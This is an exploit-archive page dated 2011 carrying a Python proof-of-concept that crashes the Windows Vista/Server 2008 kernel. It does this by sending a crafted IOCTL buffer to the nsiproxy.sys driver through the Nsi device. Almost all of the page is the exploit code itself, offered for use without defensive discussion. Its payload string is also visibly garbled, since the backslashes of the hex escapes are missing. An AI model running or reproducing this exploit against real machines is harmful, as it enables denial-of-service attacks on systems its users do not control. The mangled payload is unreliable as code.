Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
# Published : 2011-05-18
# Author :
# Previous Title : Serva32 1.2.00 RC1 Multiple Vulnerabilities
# Next Title : LiteServe 2.81 PASV Command Denial of Service

#!/usr/bin/python

############################################################################
##
## Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
## Author: Lufeng Li of Neusoft Corporation
## Vendor: www.microsoft.com
## Vulnerable: Windows Vista/Server 2008
##
############################################################################
from ctypes import *

kernel32 = windll.kernel32
Psapi    = windll.Psapi

if __name__ == '__main__':
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2

    SYM_NAME   = "\\.\Nsi"
    dwReturn      = c_ulong()
    out_buff      = ''
    in_buff       = ("x00x00x00x00x00x00x00x00xecx2dx39x6ex07x00x00x00"
                     "x01x00x00x00x00x00x00x00x38x89x6cx01x08x00x00x00"
                     "x00x00x00x00x00x00x00x00x10xfax78x00x28x00x00x00"
                     "x38xfax78x00x0cx00x00x00")

    handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)
    dev_ioct = kernel32.DeviceIoControl(handle, 0x12003f, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)